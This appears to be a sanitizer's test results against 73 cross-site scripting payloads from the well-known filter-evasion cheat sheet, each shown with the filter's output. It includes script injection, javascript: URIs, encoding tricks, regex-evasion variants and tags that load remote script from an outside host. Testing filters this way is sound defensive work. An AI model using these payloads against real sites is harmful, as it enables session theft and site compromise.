1. XSS Locator
Input code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
2. XSS Quick Test
Input code »
'';!--"<XSS>=&{()}
Output code »
'';!--"<XSS>=&{()}
3. SCRIPT w/Alert()
Input code »
<SCRIPT>alert('XSS')</SCRIPT>
Output code »
<SCRIPT>alert('XSS')</SCRIPT>
4. SCRIPT w/Source File
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Output code »
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
5. SCRIPT w/Char Code
Input code »
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
6. DIV background-image 1
Input code »
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »
<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
7. DIV background-image 2
Input code »
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »
<div style="background-image: url(denied:&#1;javascript:alert('XSS'))"></div>
8. DIV expression
Input code »
<DIV STYLE="width: expression(alert('XSS'));">
Output code »
<div style="width: (alert('XSS'));"></div>
9. IFRAME
Input code »
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Output code »
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
10. INPUT Image
Input code »
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Output code »
<input type="image" src="denied:javascript:alert('XSS');" />
11. IMG w/JavaScript Directive
Input code »
<IMG SRC="javascript:alert('XSS');">
Output code »
<img src="denied:javascript:alert('XSS');" alt="image" />
12. IMG No Quotes/Semicolon
Input code »
<IMG SRC=javascript:alert('XSS')>
Output code »
<img src="denied:javascript:alert(" alt="image" />
13. IMG Dynsrc
Input code »
<IMG DYNSRC="javascript:alert('XSS');">
Output code »
<img src="src" alt="image" />
14. IMG Lowsrc
Input code »
<IMG LOWSRC="javascript:alert('XSS');">
Output code »
<img src="src" alt="image" />
15. IMG Embedded commands 1
Input code »
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Output code »
<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
16. IMG Embedded commands 2
Input code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Output code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
17. IMG STYLE w/expression
Input code »
exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
Output code »
exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
18. IMG w/VBscript
Input code »
<IMG SRC='vbscript:msgbox("XSS")'>
Output code »
<img src="denied:vbscript:msgbox("XSS")" alt="image" />
19. LAYER
Input code »
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
Output code »
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
20. Livescript
Input code »
<IMG SRC="livescript:[code]">
Output code »
<img src="denied:livescript:[code]" alt="image" />
21. US-ASCII encoding
Input code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
Output code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
22. Mocha
Input code »
<IMG SRC="mocha:[code]">
Output code »
<img src="denied:mocha:[code]" alt="image" />
23. OBJECT
Input code »
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Output code »
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
24. OBJECT w/Embedded XSS
Input code »
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
Output code »
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>
25. Embed Flash
Input code »
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Output code »
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
26. OBJECT w/Flash 2
Input code »
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
eval(a+b+c+d);
Output code »
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
eval(a+b+c+d);
27. STYLE
Input code »
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
Output code »
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
28. STYLE w/Comment
Input code »
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Output code »
<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
29. STYLE w/Anonymous HTML
Input code »
<XSS STYLE="xss:expression(alert('XSS'))">
Output code »
<XSS STYLE="xss:expression(alert('XSS'))">
30. TABLE
Input code »
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
Output code »
<table></table>
31. TD
Input code »
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
Output code »
<table><td></td></table>
32. XML namespace
Input code »
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
Output code »
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
33. XML data island w/CDATA
Input code »
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
Output code »
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml><span></span>
34. XML data island w/comment
Input code »
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
Output code »
<XML ID="xss"><i><b><img src="src" alt="image" />cript:alert('XSS')"></b></i></XML>
<span></span>
35. XML (locally hosted)
Input code »
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
Output code »
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<span></span>
36. XML HTML+TIME
Input code »
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
Output code »
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
37. Commented-out Block
Input code »
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
Output code »
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
38. Rename .js to .jpg
Input code »
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
Output code »
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
39. SSI
Input code »
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
Output code »
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
40. PHP
Input code »
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
Output code »
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
41. JavaScript Includes
Input code »
<BR SIZE="&{alert('XSS')}">
Output code »
<br />
42. Case Insensitive
Input code »
<IMG SRC=JaVaScRiPt:alert('XSS')>
Output code »
<img src="denied:JaVaScRiPt:alert(" alt="image" />
43. HTML Entities
Input code »
<IMG SRC=javascript:alert("XSS")>
Output code »
<img src="denied:javascript:alert("XSS")" alt="image" />
44. Grave Accents
Input code »
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Output code »
<img src="denied:`javascript:alert(" alt="image" />
45. Image w/CharCode
Input code »
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Output code »
<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
46. UTF-8 Unicode Encoding
Input code »
<IMG SRC=javascript:alert('XSS')>
Output code »
<img src="denied:javascript:alert('XSS')" alt="image" />
47. Long UTF-8 Unicode w/out Semicolons
Input code »
<IMG SRC=javascript:alert('XSS')>
Output code »
<img src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041" alt="image" />
48. DIV w/Unicode
Input code »
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
Output code »
<div style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029' 029"></div>
49. Hex Encoding w/out Semicolons
Input code »
<IMG SRC=javascript:alert('XSS')>
Output code »
<img src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29" alt="image" />
50. Embedded Tab
Input code »
<IMG SRC="jav ascript:alert('XSS');">
Output code »
<img src="denied:jav ascript:alert('XSS');" alt="image" />
51. Embedded Encoded Tab
Input code »
<IMG SRC="jav	ascript:alert('XSS');">
Output code »
<img src="denied:jav	ascript:alert('XSS');" alt="image" />
52. Embedded Newline
Input code »
<IMG SRC="jav
ascript:alert('XSS');">
Output code »
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
53. Embedded Carriage Return
Input code »
<IMG SRC="jav
ascript:alert('XSS');">
Output code »
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
54. Multiline w/Carriage Returns
Input code »
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
Output code »
<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />
55. Spaces/Meta Chars
Input code »
<IMG SRC="  javascript:alert('XSS');">
Output code »
<img src="denied:&#14; javascript:alert('XSS');" alt="image" />
56. Non-Alpha/Non-Digit
Input code »
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
57. Non-Alpha/Non-Digit Part 2
Input code »
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Output code »
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
58. No Closing Script Tag
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js
Output code »
<SCRIPT SRC=http://ha.ckers.org/xss.js
59. Protocol resolution in script tags
Input code »
<SCRIPT SRC=//ha.ckers.org/.j>
Output code »
<SCRIPT SRC=//ha.ckers.org/.j>
60. Half-Open HTML/JavaScript
Input code »
<IMG SRC="javascript:alert('XSS')"
Output code »
<IMG SRC="javascript:alert('XSS')"
61. Double open angle brackets
Input code »
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
Output code »
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
62. Extraneous Open Brackets
Input code »
<<SCRIPT>alert("XSS");//<</SCRIPT>
Output code »
<<SCRIPT>alert("XSS");//<</SCRIPT>
63. Malformed IMG Tags
Input code »
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Output code »
<img src="src" alt="image" /><SCRIPT>alert("XSS")</SCRIPT>">
64. No Quotes/Semicolons
Input code »
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
Output code »
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
65. Evade Regex Filter 1
Input code »
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
66. Evade Regex Filter 2
Input code »
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
67. Evade Regex Filter 3
Input code »
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
68. Evade Regex Filter 4
Input code »
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
69. Evade Regex Filter 5
Input code »
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
70. Filter Evasion 1
Input code »
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
71. Filter Evasion 2
Input code »
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
72. Mixed Encoding
Input code »
<A HREF="h
tt p://6	6.000146.0x7.147/">XSS</A>
Output code »
<a href="denied:h tt p://6	6.000146.0x7.147/">XSS</a>
73. JavaScript Link Location
Input code »
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Output code »
<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>